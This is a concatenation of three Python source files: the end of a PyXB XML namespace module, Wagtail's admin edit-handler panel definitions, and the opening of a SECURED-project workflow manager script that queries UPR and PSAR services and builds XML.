return 'pyxb.namespace.%s' % (self.__builtinNamespaceVariable,)
def builtinModulePath (self):
from pyxb.namespace import builtin
if not self.__builtinModulePath:
raise pyxb.LogicError('Namespace has no built-in module: %s' % (self,))
mr = self.lookupModuleRecordByUID(builtin.BuiltInObjectUID)
assert mr is not None
assert mr.modulePath() == self.__builtinModulePath
return self.__builtinModulePath
def isUndeclaredNamespace (self):
"""Return True iff this namespace is always available
regardless of whether there is a declaration for it.
This is the case only for the
xml (http://www.w3.org/XML/1998/namespace) and
xmlns (http://www.w3.org/2000/xmlns/) namespaces."""
return self.__isUndeclaredNamespace
def isLoadedNamespace (self):
"""Return C{True} iff this namespace was loaded from a namespace archive."""
return self.__isLoadedNamespace
def hasBeenArchived (self):
"""Return C{True} iff this namespace has been saved to a namespace archive.
See also L{isLoadedNamespace}."""
return self.__hasBeenArchived
def description (self, description=None):
"""Get, or set, a textual description of the namespace."""
if description is not None:
self.__description = description
return self.__description
def nodeIsNamed (self, node, *local_names):
return (node.namespaceURI == self.uri()) and (node.localName in local_names)
def createExpandedName (self, local_name):
return ExpandedName(self, local_name)
def __getstate__ (self):
"""Support pickling.
Well, no, not really. Because namespace instances must be unique, we
represent them as their URI, and that's done by __getnewargs__
above. All the interesting information is in the ModuleRecords."""
return {}
def _defineBuiltins_ox (self, structures_module):
pass
__definedBuiltins = False
def _defineBuiltins (self, structures_module):
assert self.isBuiltinNamespace()
if not self.__definedBuiltins:
from pyxb.namespace import builtin
mr = self.lookupModuleRecordByUID(builtin.BuiltInObjectUID, create_if_missing=True, module_path=self.__builtinModulePath)
self._defineBuiltins_ox(structures_module)
self.__definedBuiltins = True
mr.markIncorporated()
return self
def _loadComponentsFromArchives (self, structures_module):
"""Attempts to load the named objects held in this namespace.
The base class implementation looks at the set of available archived
namespaces, and if one contains this namespace unserializes its named
object maps.
Sub-classes may choose to look elsewhere, if this version fails or
before attempting it.
There is no guarantee that any particular category of named object has
been located when this returns. Caller must check.
"""
for mr in self.moduleRecords():
if mr.isLoadable():
if mr.isPublic():
_log.info('Load %s from %s', mr, mr.archive())
try:
mr.archive().readNamespaces()
except pyxb.NamespaceArchiveError:
_log.exception("Failure reading namespaces in archive")
else:
_log.info('Ignoring private module %s in validation', mr)
self._activate()
__didValidation = False
__inValidation = False
def validateComponentModel (self, structures_module=None):
"""Ensure this namespace is ready for use.
If the namespace does not have a map of named objects, the system will
attempt to load one.
"""
if not self.__didValidation:
# assert not self.__inValidation, 'Nested validation of %s' % (self.uri(),)
if structures_module is None:
import pyxb.xmlschema.structures as structures_module
if self.isBuiltinNamespace():
self._defineBuiltins(structures_module)
try:
self.__inValidation = True
self._loadComponentsFromArchives(structures_module)
self.__didValidation = True
finally:
self.__inValidation = False
return True
def _replaceComponent (self, existing_def, replacement_def):
"""Replace the existing definition with another.
This is used in a situation where building the component model
resulted in a new component instance being created and registered, but
for which an existing component is to be preferred. An example is
when parsing the schema for XMLSchema itself: the built-in datatype
components should be retained instead of the simple type definition
components dynamically created from the schema.
By providing the value C{None} as the replacement definition, this can
also be used to remove components.
@note: Invoking this requires scans of every item in every category
map in the namespace.
@return: C{replacement_def}
"""
# We need to do replacements in the category map handler, the
# resolver, and the component associator.
return self._replaceComponent_csc(existing_def, replacement_def)
def initialNamespaceContext (self):
"""Obtain the namespace context to be used when creating components in this namespace.
Usually applies only to built-in namespaces, but is also used in the
autotests when creating a namespace without an xs:schema element.
Note that we must create the instance dynamically, since the
information that goes into it has cross-dependencies that can't be
resolved until this module has been completely loaded."""
if self.__initialNamespaceContext is None:
isn = { }
if self.__contextInScopeNamespaces is not None:
for (k, v) in six.iteritems(self.__contextInScopeNamespaces):
isn[k] = self.__identifyNamespace(v)
kw = { 'target_namespace' : self
, 'default_namespace' : self.__identifyNamespace(self.__contextDefaultNamespace)
, 'in_scope_namespaces' : isn }
self.__initialNamespaceContext = resolution.NamespaceContext(None, **kw)
return self.__initialNamespaceContext
def __identifyNamespace (self, nsval):
"""Identify the specified namespace, which should be a built-in.
Normally we can just use a reference to the Namespace module instance,
but when creating those instances we sometimes need to refer to ones
for which the instance has not yet been created. In that case, we use
the name of the instance, and resolve the namespace when we need to
create the initial context."""
if nsval is None:
return self
if isinstance(nsval, six.string_types):
nsval = globals().get(nsval)
if isinstance(nsval, Namespace):
return nsval
raise pyxb.LogicError('Cannot identify namespace from %s' % (nsval,))
def __str__ (self):
if self.__uri is None:
return 'AbsentNamespace%d' % (self.__absentNamespaceID,)
assert self.__uri is not None
if self.__boundPrefix is not None:
rv = '%s=%s' % (self.__boundPrefix, self.__uri)
else:
rv = self.__uri
return rv
from pyxb.namespace.builtin import XMLSchema_instance
from pyxb.namespace.builtin import XMLNamespaces
from pyxb.namespace.builtin import XMLSchema
from pyxb.namespace.builtin import XHTML
from pyxb.namespace.builtin import XML
from pyxb.namespace.builtin import XMLSchema_hfp
from pyxb.namespace.builtin import BuiltInObjectUID
resolution.NamespaceContext._AddTargetNamespaceAttribute(XMLSchema.createExpandedName('schema'), ExpandedName('targetNamespace'))
## Local Variables:
## fill-column:78
## End:
|
|
from __future__ import absolute_import, unicode_literals
import math
import re
import django
from django import forms
from django.core.exceptions import ImproperlyConfigured
from django.db.models.fields import FieldDoesNotExist
from django.forms.models import fields_for_model
from django.template.loader import render_to_string
from django.utils.functional import curry
from django.utils.safestring import mark_safe
from django.utils.six import text_type
from django.utils.translation import ugettext_lazy
from taggit.managers import TaggableManager
from wagtail.utils.decorators import cached_classmethod
from wagtail.wagtailadmin import compare, widgets
from wagtail.wagtailcore.models import Page
from wagtail.wagtailcore.utils import camelcase_to_underscore, resolve_model_string
# DIRECT_FORM_FIELD_OVERRIDES, FORM_FIELD_OVERRIDES are imported for backwards
# compatibility, as people are likely importing them from here and then
# appending their own overrides
from .forms import ( # NOQA
DIRECT_FORM_FIELD_OVERRIDES, FORM_FIELD_OVERRIDES, WagtailAdminModelForm, WagtailAdminPageForm,
formfield_for_dbfield)
def widget_with_script(widget, script):
return mark_safe('{0}<script>{1}</script>'.format(widget, script))
def get_form_for_model(
model, form_class=WagtailAdminModelForm,
fields=None, exclude=None, formsets=None, exclude_formsets=None, widgets=None
):
# django's modelform_factory with a bit of custom behaviour
attrs = {'model': model}
if fields is not None:
attrs['fields'] = fields
if exclude is not None:
attrs['exclude'] = exclude
if widgets is not None:
attrs['widgets'] = widgets
if formsets is not None:
attrs['formsets'] = formsets
if exclude_formsets is not None:
attrs['exclude_formsets'] = exclude_formsets
# Give this new form class a reasonable name.
class_name = model.__name__ + str('Form')
bases = (object,)
if hasattr(form_class, 'Meta'):
bases = (form_class.Meta,) + bases
form_class_attrs = {
'Meta': type(str('Meta'), bases, attrs)
}
metaclass = type(form_class)
return metaclass(class_name, (form_class,), form_class_attrs)
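# Illustrative usage (EventPage and the field list are hypothetical): builds a
# WagtailAdminPageForm subclass limited to the given fields, with an optional
# widget override.
#   EventPageForm = get_form_for_model(
#       EventPage, form_class=WagtailAdminPageForm,
#       fields=['title', 'date', 'location'],
#       widgets={'date': forms.DateInput})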
def extract_panel_definitions_from_model_class(model, exclude=None):
if hasattr(model, 'panels'):
return model.panels
panels = []
_exclude = []
if exclude:
_exclude.extend(exclude)
fields = fields_for_model(model, exclude=_exclude, formfield_callback=formfield_for_dbfield)
for field_name, field in fields.items():
try:
panel_class = field.widget.get_panel()
except AttributeError:
panel_class = FieldPanel
panel = panel_class(field_name)
panels.append(panel)
return panels
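# Illustrative result (hypothetical BlogPage model with no explicit `panels`
# attribute): one FieldPanel per editable form field, unless the field's
# widget supplies its own panel class via get_panel().
#   extract_panel_definitions_from_model_class(BlogPage)
#   -> [FieldPanel('title'), FieldPanel('body'), ...]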
class EditHandler(object):
"""
Abstract class providing sensible default behaviours for objects implementing
the EditHandler API
"""
# return list of widget overrides that this EditHandler wants to be in place
# on the form it receives
@classmethod
def widget_overrides(cls):
return {}
# return list of fields that this EditHandler expects to find on the form
@classmethod
def required_fields(cls):
return []
# return a dict of formsets that this EditHandler requires to be present
# as children of the ClusterForm; the dict is a mapping from relation name
# to parameters to be passed as part of get_form_for_model's 'formsets' kwarg
@classmethod
def required_formsets(cls):
return {}
# return any HTML that needs to be output on the edit page once per edit handler definition.
# Typically this will be used to define snippets of HTML within <script type="text/x-template"></script> blocks
# for Javascript code to work with.
@classmethod
def html_declarations(cls):
return ''
def __init__(self, instance=None, form=None):
if not instance:
raise ValueError("EditHandler did not receive an instance object")
self.instance = instance
if not form:
raise ValueError("EditHandler did not receive a form object")
self.form = form
# Heading / help text to display to the user
heading = ""
help_text = ""
def classes(self):
"""
Additional CSS classnames to add to whatever kind of object this is at output.
Subclasses of EditHandler should override this, invoking super(B, self).classes() to
append more classes specific to the situation.
"""
classes = []
try:
classes.append(self.classname)
except AttributeError:
pass
return classes
def field_type(self):
"""
The kind of field it is, e.g. boolean_field. Useful for better semantic markup of field display based on type.
"""
return ""
def id_for_label(self):
"""
The ID to be used as the 'for' attribute of any <label> elements that refer
to this object but are rendered outside of it. Leave blank if this object does not render
as a single input field.
"""
return ""
def render_as_object(self):
"""
Render this object as it should appear within an ObjectList. Should not
include the <h2> heading or help text - ObjectList will supply those
"""
# by default, assume that the subclass provides a catch-all render() method
return self.render()
def render_as_field(self):
"""
Render this object as it should appear within a <ul class="fields"> list item
"""
# by default, assume that the subclass provides a catch-all render() method
return self.render()
def render_missing_fields(self):
"""
Helper function: render all of the fields that are defined on the form but not "claimed" by
any panels via required_fields. These fields are most likely to be hidden fields introduced
by the forms framework itself, such as ORDER / DELETE fields on formset members.
(If they aren't actually hidden fields, then they will appear as ugly unstyled / label-less fields
outside of the panel furniture. But there's not much we can do about that.)
"""
rendered_fields = self.required_fields()
missing_fields_html = [
text_type(self.form[field_name])
for field_name in self.form.fields
if field_name not in rendered_fields
]
return mark_safe(''.join(missing_fields_html))
def render_form_content(self):
"""
Render this as an 'object', ensuring that all fields necessary for a valid form
submission are included
"""
return mark_safe(self.render_as_object() + self.render_missing_fields())
@classmethod
def get_comparison(cls):
return []
class BaseCompositeEditHandler(EditHandler):
"""
Abstract class for EditHandlers that manage a set of sub-EditHandlers.
Concrete subclasses must attach a 'children' property
"""
_widget_overrides = None
@classmethod
def widget_overrides(cls):
if cls._widget_overrides is None:
# build a collated version of all its children's widget lists
widgets = {}
for handler_class in cls.children:
widgets.update(handler_class.widget_overrides())
cls._widget_overrides = widgets
return cls._widget_overrides
_required_fields = None
@classmethod
def required_fields(cls):
if cls._required_fields is None:
fields = []
for handler_class in cls.children:
fields.extend(handler_class.required_fields())
cls._required_fields = fields
return cls._required_fields
_required_formsets = None
@classmethod
def required_formsets(cls):
if cls._required_formsets is None:
formsets = {}
for handler_class in cls.children:
formsets.update(handler_class.required_formsets())
cls._required_formsets = formsets
return cls._required_formsets
@classmethod
def html_declarations(cls):
return mark_safe(''.join([c.html_declarations() for c in cls.children]))
def __init__(self, instance=None, form=None):
super(BaseCompositeEditHandler, self).__init__(instance=instance, form=form)
self.children = []
for child in self.__class__.children:
if not getattr(child, "children", None) and getattr(child, "field_name", None):
if self.form._meta.exclude:
if child.field_name in self.form._meta.exclude:
continue
if self.form._meta.fields:
if child.field_name not in self.form._meta.fields:
continue
self.children.append(child(instance=self.instance, form=self.form))
def render(self):
return mark_safe(render_to_string(self.template, {
'self': self
}))
@classmethod
def get_comparison(cls):
comparators = []
for child in cls.children:
comparators.extend(child.get_comparison())
return comparators
class BaseFormEditHandler(BaseCompositeEditHandler):
"""
Base class for edit handlers that can construct a form class for all their
child edit handlers.
"""
# The form class used as the base for constructing specific forms for this
# edit handler. Subclasses can override this attribute to provide a form
# with custom validation, for example. Custom forms must subclass
# WagtailAdminModelForm
base_form_class = None
_form_class = None
@classmethod
def get_form_class(cls, model):
"""
Construct a form class that has all the fields and formsets named in
the children of this edit handler.
"""
if cls._form_class is None:
# If a custom form class was passed to the EditHandler, use it.
# Otherwise, use the base_form_class from the model.
# If that is not defined, use WagtailAdminModelForm.
model_form_class = getattr(model, 'base_form_class', WagtailAdminModelForm)
base_form_class = cls.base_form_class or model_form_class
cls._form_class = get_form_for_model(
model,
form_class=base_form_class,
fields=cls.required_fields(),
formsets=cls.required_formsets(),
widgets=cls.widget_overrides())
return cls._form_class
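# Illustrative sketch (EventPage / EventPageForm are hypothetical): a model can
# supply its own base form via 'base_form_class'; it must subclass
# WagtailAdminModelForm (WagtailAdminPageForm for pages) and is picked up by
# get_form_class() above.
#
#     class EventPageForm(WagtailAdminPageForm):
#         def clean(self):
#             cleaned_data = super(EventPageForm, self).clean()
#             # custom cross-field validation goes here
#             return cleaned_data
#
#     class EventPage(Page):
#         base_form_class = EventPageForm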
class BaseTabbedInterface(BaseFormEditHandler):
template = "wagtailadmin/edit_handlers/tabbed_interface.html"
class TabbedInterface(object):
def __init__(self, children, base_form_class=None):
self.children = children
self.base_form_class = base_form_class
def bind_to_model(self, model):
return type(str('_TabbedInterface'), (BaseTabbedInterface,), {
'model': model,
'children': [child.bind_to_model(model) for child in self.children],
'base_form_class': self.base_form_class,
})
class BaseObjectList(BaseFormEditHandler):
template = "wagtailadmin/edit_handlers/object_list.html"
class ObjectList(object):
def __init__(self, children, heading="", classname="",
base_form_class=None):
self.children = children
self.heading = heading
self.classname = classname
self.base_form_class = base_form_class
def bind_to_model(self, model):
return type(str('_ObjectList'), (BaseObjectList,), {
'model': model,
'children': [child.bind_to_model(model) for child in self.children],
'heading': self.heading,
'classname': self.classname,
'base_form_class': self.base_form_class,
})
class BaseFieldRowPanel(BaseCompositeEditHandler):
template = "wagtailadmin/edit_handlers/field_row_panel.html"
class FieldRowPanel(object):
def __init__(self, children, classname=""):
self.children = children
self.classname = classname
def bind_to_model(self, model):
col_count = " col" + str(int(math.floor(12 / len(self.children))))
# If child panel doesn't have a col# class then append default based on
# number of columns
for child in self.children:
if not re.search(r'\bcol\d+\b', child.classname):
child.classname += col_count
return type(str('_FieldRowPanel'), (BaseFieldRowPanel,), {
'model': model,
'children': [child.bind_to_model(model) for child in self.children],
'classname': self.classname,
})
class BaseMultiFieldPanel(BaseCompositeEditHandler):
template = "wagtailadmin/edit_handlers/multi_field_panel.html"
def classes(self):
classes = super(BaseMultiFieldPanel, self).classes()
classes.append("multi-field")
return classes
class MultiFieldPanel(object):
def __init__(self, children, heading="", classname=""):
self.children = children
self.heading = heading
self.classname = classname
def bind_to_model(self, model):
return type(str('_MultiFieldPanel'), (BaseMultiFieldPanel,), {
'model': model,
'children': [child.bind_to_model(model) for child in self.children],
'heading': self.heading,
'classname': self.classname,
})
class BaseFieldPanel(EditHandler):
TEMPLATE_VAR = 'field_panel'
@classmethod
def widget_overrides(cls):
"""check if a specific widget has been defined for this field"""
if hasattr(cls, 'widget'):
return {cls.field_name: cls.widget}
else:
return {}
def __init__(self, instance=None, form=None):
super(BaseFieldPanel, self).__init__(instance=instance, form=form)
self.bound_field = self.form[self.field_name]
self.heading = self.bound_field.label
self.help_text = self.bound_field.help_text
def classes(self):
classes = super(BaseFieldPanel, self).classes()
if self.bound_field.field.required:
classes.append("required")
if self.bound_field.errors:
classes.append("error")
classes.append(self.field_type())
return classes
def field_type(self):
return camelcase_to_underscore(self.bound_field.field.__class__.__name__)
def id_for_label(self):
return self.bound_field.id_for_label
object_template = "wagtailadmin/edit_handlers/single_field_panel.html"
def render_as_object(self):
return mark_safe(render_to_string(self.object_template, {
'self': self,
self.TEMPLATE_VAR: self,
'field': self.bound_field,
}))
field_template = "wagtailadmin/edit_handlers/field_panel_field.html"
def render_as_field(self):
context = {
'field': self.bound_field,
'field_type': self.field_type(),
}
return mark_safe(render_to_string(self.field_template, context))
@classmethod
def required_fields(cls):
return [cls.field_name]
@classmethod
def get_comparison_class(cls):
# Hide fields with hidden widget
widget_override = cls.widget_overrides().get(cls.field_name, None)
if widget_override and widget_override.is_hidden:
return
try:
field = cls.model._meta.get_field(cls.field_name)
if field.choices:
return compare.ChoiceFieldComparison
if field.is_relation:
if isinstance(field, TaggableManager):
return compare.TagsFieldComparison
elif field.many_to_many:
return compare.M2MFieldComparison
return compare.ForeignObjectComparison
if field.get_internal_type() in ['CharField', 'TextField']:
return compare.RichTextFieldComparison
except FieldDoesNotExist:
pass
return compare.FieldComparison
@classmethod
def get_comparison(cls):
comparator_class = cls.get_comparison_class()
if comparator_class:
field = cls.model._meta.get_field(cls.field_name)
return [curry(comparator_class, field)]
else:
return []
class FieldPanel(object):
def __init__(self, field_name, classname="", widget=None):
self.field_name = field_name
self.classname = classname
self.widget = widget
def bind_to_model(self, model):
base = {
'model': model,
'field_name': self.field_name,
'classname': self.classname,
}
if self.widget:
base['widget'] = self.widget
return type(str('_FieldPanel'), (BaseFieldPanel,), base)
class BaseRichTextFieldPanel(BaseFieldPanel):
@classmethod
def get_comparison_class(cls):
return compare.RichTextFieldComparison
class RichTextFieldPanel(object):
def __init__(self, field_name):
self.field_name = field_name
def bind_to_model(self, model):
return type(str('_RichTextFieldPanel'), (BaseRichTextFieldPanel,), {
'model': model,
'field_name': self.field_name,
})
class BaseChooserPanel(BaseFieldPanel):
"""
Abstract superclass for panels that provide a modal interface for choosing (or creating)
a database object such as an image, resulting in an ID that is used to populate
a hidden foreign key input.
Subclasses provide:
* field_template (only required if the default template of field_panel_field.html is not usable)
* object_type_name - something like 'image' which will be used as the var name
for the object instance in the field_template
"""
def get_chosen_item(self):
field = self.instance._meta.get_field(self.field_name)
related_model = field.rel.model
try:
return getattr(self.instance, self.field_name)
except related_model.DoesNotExist:
# if the ForeignKey is null=False, Django decides to raise
# a DoesNotExist exception here, rather than returning None
# like every other unpopulated field type. Yay consistency!
return None
def render_as_field(self):
instance_obj = self.get_chosen_item()
context = {
'field': self.bound_field,
self.object_type_name: instance_obj,
'is_chosen': bool(instance_obj), # DEPRECATED - passed to templates for backwards compatibility only
}
return mark_safe(render_to_string(self.field_template, context))
class BasePageChooserPanel(BaseChooserPanel):
object_type_name = "page"
@classmethod
def widget_overrides(cls):
return {cls.field_name: widgets.AdminPageChooser(
target_models=cls.target_models(),
can_choose_root=cls.can_choose_root)}
@cached_classmethod
def target_models(cls):
if cls.page_type:
target_models = []
for page_type in cls.page_type:
try:
target_models.append(resolve_model_string(page_type))
except LookupError:
raise ImproperlyConfigured(
"{0}.page_type must be of the form 'app_label.model_name', given {1!r}".format(
cls.__name__, page_type
)
)
except ValueError:
raise ImproperlyConfigured(
"{0}.page_type refers to model {1!r} that has not been installed".format(
cls.__name__, page_type
)
)
return target_models
else:
return [cls.model._meta.get_field(cls.field_name).rel.to]
class PageChooserPanel(object):
def __init__(self, field_name, page_type=None, can_choose_root=False):
self.field_name = field_name
if page_type:
# Convert single string/model into list
if not isinstance(page_type, (list, tuple)):
page_type = [page_type]
else:
page_type = []
self.page_type = page_type
self.can_choose_root = can_choose_root
def bind_to_model(self, model):
return type(str('_PageChooserPanel'), (BasePageChooserPanel,), {
'model': model,
'field_name': self.field_name,
'page_type': self.page_type,
'can_choose_root': self.can_choose_root,
})
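# Illustrative usage sketch (the 'related_page' field and 'blog.BlogPage' model
# are hypothetical): page_type limits the chooser to the given page classes,
# passed as 'app_label.ModelName' strings or model classes.
#
#     content_panels = Page.content_panels + [
#         PageChooserPanel('related_page', page_type='blog.BlogPage'),
#     ]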
class BaseInlinePanel(EditHandler):
@classmethod
def get_panel_definitions(cls):
# Look for a panels definition in the InlinePanel declaration
if cls.panels is not None:
return cls.panels
# Failing that, get it from the model
else:
return extract_panel_definitions_from_model_class(
cls.related.related_model,
exclude=[cls.related.field.name]
)
_child_edit_handler_class = None
@classmethod
def get_child_edit_handler_class(cls):
if cls._child_edit_handler_class is None:
panels = cls.get_panel_definitions()
cls._child_edit_handler_class = MultiFieldPanel(
panels,
heading=cls.heading
).bind_to_model(cls.related.related_model)
return cls._child_edit_handler_class
@classmethod
def required_formsets(cls):
child_edit_handler_class = cls.get_child_edit_handler_class()
return {
cls.relation_name: {
'fields': child_edit_handler_class.required_fields(),
'widgets': child_edit_handler_class.widget_overrides(),
'min_num': cls.min_num,
'validate_min': cls.min_num is not None,
'max_num': cls.max_num,
'validate_max': cls.max_num is not None
}
}
@classmethod
def html_declarations(cls):
return cls.get_child_edit_handler_class().html_declarations()
@classmethod
def get_comparison(cls):
field = cls.model._meta.get_field(cls.relation_name)
field_comparisons = []
for panel in cls.get_panel_definitions():
field_comparisons.extend(panel.bind_to_model(cls.related.related_model).get_comparison())
return [curry(compare.ChildRelationComparison, field, field_comparisons)]
def __init__(self, instance=None, form=None):
super(BaseInlinePanel, self).__init__(instance=instance, form=form)
self.formset = form.formsets[self.__class__.relation_name]
child_edit_handler_class = self.__class__.get_child_edit_handler_class()
self.children = []
for subform in self.formset.forms:
# override the DELETE field to have a hidden input
subform.fields['DELETE'].widget = forms.HiddenInput()
# ditto for the ORDER field, if present
if self.formset.can_order:
subform.fields['ORDER'].widget = forms.HiddenInput()
self.children.append(
child_edit_handler_class(instance=subform.instance, form=subform)
)
# if this formset is valid, it may have been re-ordered; respect that
# in case the parent form errored and we need to re-render
if self.formset.can_order and self.formset.is_valid():
self.children = sorted(self.children, key=lambda x: x.form.cleaned_data['ORDER'])
empty_form = self.formset.empty_form
empty_form.fields['DELETE'].widget = forms.HiddenInput()
if self.formset.can_order:
empty_form.fields['ORDER'].widget = forms.HiddenInput()
self.empty_child = child_edit_handler_class(instance=empty_form.instance, form=empty_form)
template = "wagtailadmin/edit_handlers/inline_panel.html"
def render(self):
formset = render_to_string(self.template, {
'self': self,
'can_order': self.formset.can_order,
})
js = self.render_js_init()
return widget_with_script(formset, js)
js_template = "wagtailadmin/edit_handlers/inline_panel.js"
def render_js_init(self):
return mark_safe(render_to_string(self.js_template, {
'self': self,
'can_order': self.formset.can_order,
}))
class InlinePanel(object):
def __init__(self, relation_name, panels=None, classname='', label='', help_text='', min_num=None, max_num=None):
self.relation_name = relation_name
self.panels = panels
self.label = label
self.help_text = help_text
self.min_num = min_num
self.max_num = max_num
self.classname = classname
def bind_to_model(self, model):
if django.VERSION >= (1, 9):
related = getattr(model, self.relation_name).rel
else:
related = getattr(model, self.relation_name).related
return type(str('_InlinePanel'), (BaseInlinePanel,), {
'model': model,
'relation_name': self.relation_name,
'related': related,
'panels': self.panels,
'heading': self.label,
'help_text': self.help_text,
# TODO: can we pick this out of the foreign key definition as an alternative?
# (with a bit of help from the inlineformset object, as we do for label/heading)
'min_num': self.min_num,
'max_num': self.max_num,
'classname': self.classname,
})
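# Illustrative usage sketch (the 'carousel_items' child relation is
# hypothetical; it would be defined with a ParentalKey on the child model):
#
#     content_panels = Page.content_panels + [
#         InlinePanel('carousel_items', label="Carousel items", min_num=1, max_num=5),
#     ]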
# This allows users to include the publishing panel in their own per-model override
# without having to write these fields out by hand, potentially losing 'classname'
# and therefore the associated styling of the publishing panel
def PublishingPanel():
return MultiFieldPanel([
FieldRowPanel([
FieldPanel('go_live_at'),
FieldPanel('expire_at'),
], classname="label-above"),
], ugettext_lazy('Scheduled publishing'), classname="publishing")
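# Illustrative sketch (EventPage and its extra field are hypothetical): a model
# overriding settings_panels can keep the styled publishing panel without
# re-declaring its fields.
#
#     class EventPage(Page):
#         settings_panels = [
#             PublishingPanel(),
#             FieldPanel('registration_closes_at'),
#         ]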
# Now that we've defined EditHandlers, we can set up wagtailcore.Page to have some.
Page.content_panels = [
FieldPanel('title', classname="full title"),
]
Page.promote_panels = [
MultiFieldPanel([
FieldPanel('slug'),
FieldPanel('seo_title'),
FieldPanel('show_in_menus'),
FieldPanel('search_description'),
], ugettext_lazy('Common page configuration')),
]
Page.settings_panels = [
PublishingPanel()
]
Page.base_form_class = WagtailAdminPageForm
@cached_classmethod
def get_edit_handler(cls):
"""
Get the EditHandler to use in the Wagtail admin when editing this page type.
"""
if hasattr(cls, 'edit_handler'):
return cls.edit_handler.bind_to_model(cls)
# construct a TabbedInterface made up of content_panels, promote_panels
# and settings_panels, skipping any which are empty
tabs = []
if cls.content_panels:
tabs.append(ObjectList(cls.content_panels, heading=ugettext_lazy('Content')))
if cls.promote_panels:
tabs.append(ObjectList(cls.promote_panels, heading=ugettext_lazy('Promote')))
if cls.settings_panels:
tabs.append(ObjectList(cls.settings_panels, heading=ugettext_lazy('Settings'), classname="settings"))
EditHandler = TabbedInterface(tabs, base_form_class=cls.base_form_class)
return EditHandler.bind_to_model(cls)
Page.get_edit_handler = get_edit_handler
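# Illustrative sketch (SimplePage is hypothetical): a page class that defines
# 'edit_handler' bypasses the default Content/Promote/Settings tab construction
# above and binds the given interface instead.
#
#     class SimplePage(Page):
#         edit_handler = TabbedInterface([
#             ObjectList(Page.content_panels, heading='Content'),
#             ObjectList(Page.settings_panels, heading='Settings', classname='settings'),
#         ])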
class BaseStreamFieldPanel(BaseFieldPanel):
def classes(self):
classes = super(BaseStreamFieldPanel, self).classes()
classes.append("stream-field")
# In case of a validation error, BlockWidget will take care of outputting the error on the
# relevant sub-block, so we don't want the stream block as a whole to be wrapped in an 'error' class.
if 'error' in classes:
classes.remove("error")
return classes
@classmethod
def html_declarations(cls):
return cls.block_def.all_html_declarations()
@classmethod
def get_comparison_class(cls):
return compare.StreamFieldComparison
def id_for_label(self):
# a StreamField may consist of many input fields, so it's not meaningful to
# attach the label to any specific one
return ""
class StreamFieldPanel(object):
def __init__(self, field_name):
self.field_name = field_name
def bind_to_model(self, model):
return type(str('_StreamFieldPanel'), (BaseStreamFieldPanel,), {
'model': model,
'field_name': self.field_name,
'block_def': model._meta.get_field(self.field_name).stream_block
})
|
|
#
# The Offline workflow manager (WFM)
#
# Dependencies: pip install json2xml dicttoxml termcolor
#
# Formal usage: ./workflow_manager.py <username> <password/token> <upr_url> <spm_url> <psar_url>
# Example usage: ./workflow_manager.py adrian badpassword http://195.235.93.146:8081 130.192.225.109 http://195.235.93.146:8080
import json
import base64
import requests
import dicttoxml
import upr_client # SECURED component
import psarClient # SECURED component
import workflow_manager # SECURED component
import xml.etree.ElementTree as ET
from sys import argv
from time import sleep
from termcolor import colored
from lxml import etree, objectify
from lxml.etree import XMLSyntaxError
class WorkflowManager(object):
DEBUG = True
def dbprint(self, string):
if self.DEBUG == True:
print string
# Get the right PSA for the MSPL requirements
def get_psa_assoc(mspl):
f = open('xmlSchema/PSA_Review.xml', 'r')
psa_xml = f.read()
f.close()
mspl_capabilities = []
tree = ET.fromstring(mspl)
root = tree
for child in root:
for a in child:
if (str(a.tag).endswith("capability")):
for b in a:
mspl_capabilities.append(b.text)
tree = ET.fromstring(psa_xml)
root = tree
for child in root:
for a in child:
psa_name = a.attrib['name']
for b in a:
if str(b.tag).endswith("capability"):
psa_capabilities = []
right_psa = False
for c in b:
if str(c.tag).endswith("capability_list"):
psa_capabilities.append(c.text)
for mspl_cap in mspl_capabilities:
if mspl_cap in psa_capabilities:
right_psa = True
else:
right_psa = False
if right_psa == True:
return str(psa_name)
return None
# Extract the capabilities from an MSPL file and return as a list
def get_capability_from_mspl(self, mspl):
capabilities = ""
tree = ET.fromstring(mspl)
root = tree
for child in root:
for a in child:
if (str(a.tag).endswith("capability")):
for b in a:
print "Discovered capability: " + str(b.text)
capabilities = capabilities + str(b.text)
return capabilities
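# Rough shape of the MSPL fragment walked above (an illustrative sketch only;
# the enclosing element names and the capability value are placeholders, not
# the full SECURED MSPL schema): every text value found beneath a <capability>
# element is appended to the returned string.
#
#     <mspl>                      <!-- placeholder element names -->
#       <configuration>
#         <capability>
#           <Name>SOME_CAPABILITY</Name>
#         </capability>
#       </configuration>
#     </mspl>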
def get_subject_xml_file(self, upr_url):
upr = upr_client.UPRClient(str(upr_url))
r = upr.get_user_list()
if r.status_code != 200:
raise Exception("ERROR: Could not contact the UPR")
users = r.json()
output = "<?xml version='1.0' encoding='UTF-8'?>"
output += """<tns:associationList xmlns:tns='http://www.example.org/AssociationList'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
xsi:schemaLocation='http://www.example.org/AssociationList
../../java/schema/AssociationList_Schema.xsd '>"""
for user in users:
output += "<tns:associations Name='" + str(
user['user_id']) + "'><tns:IP ip_value='0.0.0.0/0.0.0.0'/></tns:associations>"
output += "</tns:associationList>"
return output
def get_market_psa_xml(self, user, psar_url):
# Why is this one line? His majesty, the SPM, gets very unhappy about whitespace. TODO: clean this up
xml = """<?xml version="1.0" encoding="UTF-8"?><tns:Mapping xmlns:tns="http://www.example.org/Refinement_Schema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.example.org/Refinement_Schema Refinement_Schema.xsd ">"""
psar = psarClient.Client(str(psar_url))
print "INFO: This normal user will have access to the full PSA catalogue"
print str(psar_url)
r = psar.get_image_list(is_generic=False)
if r.status_code != 200:
print "ERROR get_market_psa_xml: OH NO. When getting PSAs, the PSAR returned " + str(r.status_code)
raise Exception('No PSAs could be found')
psa_list = r.json()
# Where "psa" is the PSA_ID
xml += "<tns:psa_list>"
for psa in psa_list:
r = psar.get_psa_capabilities(psa['psa_id'])
if r.status_code == 200:
xml += '<tns:psa name="' + psa['psa_id'] + '">'
xml += '<tns:PSA_info />'
xml += '<tns:PSA_characteristic cost="' + str(psa['cost']) + '" latency="' + \
str(psa['latency']) + '" rating="' + str(psa['rating']) + '" />'
cap_list = r.json()['capabilities']
xml += '<tns:capability>'
for c in cap_list:
xml += '<tns:capability_list>' + c + '</tns:capability_list>'
xml += '</tns:capability>'
xml += '</tns:psa>'
else:
print colored(str(r.status_code) + " NO CAPABILITIES FOUND FOR PSA: " + str(psa), 'red')
xml += '</tns:psa_list></tns:Mapping>'
return xml
# Should collect slightly different input depending on whether an HSPL or an SG is given
def collectInput(self, refinement_type, hspl_xml, user_sg, user_psa_xml, psa_market_xml,
subject_xml, content_xml, target_xml, opt_profile_string, max_evals):
